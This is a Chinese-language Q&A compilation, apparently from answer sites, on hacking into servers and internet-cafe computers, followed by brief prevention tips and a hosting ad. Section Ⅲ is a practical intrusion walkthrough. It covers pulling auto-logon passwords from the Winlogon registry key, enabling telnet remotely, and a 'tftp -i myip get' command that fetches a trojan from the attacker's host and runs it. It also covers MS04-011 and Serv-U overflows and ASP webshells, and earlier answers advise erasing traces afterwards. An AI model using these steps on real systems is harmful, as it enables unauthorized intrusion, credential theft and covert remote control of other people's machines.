Ⅰ 如何入侵伺服器
不用第3方軟體可就難了,至少要有比較高的網路和編程基礎。。。。
主要是通過掃描埠找漏洞,然後用軟體注入。。。不過這都需要第3方軟體的,當然你可以自己用命令實現
Ⅱ 知道伺服器的ip和埠號,怎麼入侵啊,老師讓我們自己嘗試,我不幹違法的事哦。
首先掃描伺服器上的網站漏洞,然後根據網站漏洞拿下網站許可權,然後得到WebShell,然後在Webshell裡面提許可權,開遠程埠,一般都是3389埠,然後就mstsc遠程桌面裡面連接,格式為ip地址:遠程埠,然後就輸入用戶名,密碼。然後就拿下了這台伺服器。最後記得擦屁股哦..
Ⅲ 如何入侵網吧主機
一.
網吧入侵
入侵的方法很多,但對網吧入侵最常用的方法是什麼呢?首先,自動登陸。現在網吧一般都是win2000或者
windows
xp的機器,網管一般都把機子設置為自動登陸!這樣我們開機進入系統的時候登陸窗口一閃而過!著時候如果我們findfass.exe試圖把登陸賬號密碼找出來是不會成功的!因為賬號密碼根本不在內存中,而findfass.exe通過winlogon的PID號和正確的域名中,在內存尋找好段加了密的內存塊(保存著加密過的登陸密碼),然後對它進行解密,這樣就能得到明文的密碼。實際上自動登陸的賬號密碼都在注冊表中。我們打開注冊表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\這個目錄下,AutoAdminLogon這一項的鍵值為1,表示自動登陸。為1的時候,打開控制面板的用戶和密碼,會發現需要密碼前面的鉤已經去掉了。DefaultUserName對應的鍵值就是登陸用戶名,DefaultPassword對應的鍵值就是登陸密碼。實際上海洋頂端木馬2006就有著一功能,原理是一樣的,不過因為許可權的問題,不一定能讀出來。這樣,密碼賬號我們都找出來了。
你要知道,一個網吧的自動登陸密碼賬號一般都是一樣的,而且網管為了方便網蟲上網一般把他們設置在管理員組,至少user組。知道了密碼賬號還愁入侵不了么?網吧機子的server服務一般是禁用的,那我們就不能用ipc入侵了。opentelnet.exe我們也用不了,因為著個也依賴ipc連接,
dameware遠程式控制制也不行,道理一樣。我們可以用recton著個小巧實用的工具來開telnet,這個工具在win2000下面特別好使。
開了telnet後,我們telnet上去,先在本機打開tftpd32.exe,再telnet下面telnet
-i
myip
get
3721.exe
c:\3721.exe,這樣就把我們的木馬3721.exe比如radmin傳過去了。
再在telnet下面直接運行3721.exe就ok了。
另一個方法就是ms04011漏洞,別以為著個漏洞已經過時了,在網吧這個漏洞還是相當普遍的,許多網吧的網管只會裝游戲,重裝系統,不重視著寫漏洞,懶得打補丁!我們用DSScan掃描192.168.0.1-192.168.0.255,一般會你會很驚喜的。我們到用ms04011溢出工具溢出,一下子就得到了系統許可權。
還有很多入侵方法,你可以把xscan搬出來掃描一下。很多菜鳥喜歡用啊D工具包來掃網吧的空口令,實際上這個工具掃用戶賬號密碼很弱,以前我試過,我用上面第一種方法發現網吧都有一個密碼為空的管理員賬號,用啊D工具包只掃出幾台機子有這個賬號。我經常用我的最愛閃電狐
——火狐埠掃描器來掃一下網吧主機,第一伺服器等。著個掃描器速度很快,掃1到10000埠也要不了幾分鍾。如果發現伺服器開80斷口,自然是看是不是架設了網站。再看網站十分有漏洞,想辦法傳個asp木馬上去提升許可權。如果發現電影伺服器裝了serv_u,而且你有了一個賬號,可以嘗試一下
serv_u的溢出。
Ⅳ 黑客是怎麼入侵攻擊伺服器的
攻擊的方法和手段
(1) 尋找目標,獲取信息。有明確的攻擊目標。尋找有漏洞的機器,發現之後進行攻擊。即一種是先有目標,另外一種是先有工具。一般來說,如「蠕蟲事件」,更多地屬於後一種。病毒和黑客的融合,使攻擊自動化是目前比較流行的趨勢。很多問題,過去的手工病毒,要繁殖生存,通過傳播刪除數據。黑客在發現「後門」後,利用這些病毒手段進行攻擊。掃描是常用的尋找漏洞的手段。那麼,哪些服務必須提供,哪些服務不需要提供,例如用戶所不需要的某些功能服務作為選項在安裝時會存在在系統中,這樣就可能有漏洞存在在系統中。因此,如果接受的服務越多,就可能存在的問題越多。因此,不透明、經常變化、不定期升級、動態口令,使系統在變化中變得相對安全。目前,很多情況下,用戶對自己的系統中的漏洞並不了解,某些先天不合理的缺陷存在在系統中,如果有人攻擊這個弱點,就成為問題。所以,第一,要首先了解自己的系統。版本信息也是重要的,不同的版本,有不同的弱點,就可能成為攻擊對象。系統的關鍵文件也是重要的,可以從中提取用戶名和口令。
(2) 獲取系統敏感文件的方法。匿名FTP、TFTP等。採用TFTP在很多蠕蟲、強力攻擊弱口令等手段中進行使用。
(3) 獲取初始訪問許可權。如採用監聽手段竊取口令。匿名FTP,利用主機間的預設口令或信任關系(口令)等。利用發郵件,告訴你附件是個升級包,但有可能是一個病毒。利用技術防範上的漏洞。
(4) 獲取超級用戶口令。如SNIFER、緩沖區溢出等手段獲取特權。目前的開發安全理論已經引起重視。軟體工程與軟體安全已經成為一個並行的方式。軟體越龐大,漏洞越多。目前國內有人發現MICROSOFT有6個漏洞,據說這次發現之後直接就在網上公布了,但微軟還沒有找到相應的解決辦法。所以給用戶帶來很大的風險。
(5) 消除痕跡。破壞系統後使用。
(6) 慣用手法。TFTP、拒絕服務(分布式拒絕服務)、SNIFFER嗅探器、緩沖區溢出、SYN同步風暴(發出大量的連接請求,但並不管連接結果,大量佔用用戶資源,出現死機。)目前有一種技術,使系統的資源只能用到60%等。採用路由器設置提高網路質量。但是對於公共系統,路由配置拒絕服務比較難。對於路由器的攻擊,竊取許可權修改路由表,或者造成資源DOWN機。因此,要經常檢查路由器的狀態。採取措施之前,應該先記錄原始狀態參數,不要輕易地重啟技術。
--------------------------
如何預防黑客
(1) 升級系統,打補丁
(2) 防火牆
(3) 使用入侵掃描工具
(4) 不要輕易安裝不明軟體
(5) 經常檢查日誌
如果是伺服器受到DDOS攻擊,可以通過選擇帶防禦的高防伺服器預防。希望英虎網路的回答能夠幫到您!